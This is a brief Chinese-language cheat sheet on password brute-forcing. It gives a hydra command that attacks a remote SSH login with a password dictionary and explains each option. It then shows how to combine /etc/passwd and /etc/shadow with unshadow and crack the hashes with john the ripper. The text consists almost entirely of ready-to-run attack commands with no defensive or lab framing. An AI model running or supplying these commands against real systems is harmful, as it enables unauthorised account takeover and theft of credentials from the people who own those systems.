ssh 爆破
- hydra 远程ssh爆破
hydra -l user -P dic.lst ssh://1.1.1.1 -vV -f -o hydra.ssh
# -l : 用户名
#-L : 指定用户字典文件
#- P: 密码字典
#-f : 成功就停止
# -o : 保存结果到文件
#-vV : 显示详细过程
# -s :指定端口
#ssh : ssh服务
- john 本地密码爆破
#unshadow命令基本上会结合/etc/passwd的数据和/etc/shadow的数据,创建1个含有用户名和密码详细信息的文件
unshadow /etc/passwd /etc/shadow |uniq > shadow
#使用密码字典进行爆破
john --wordlist=/usr/share/john/password.lst --rules shadow
#指定字典直接爆破
john shadow
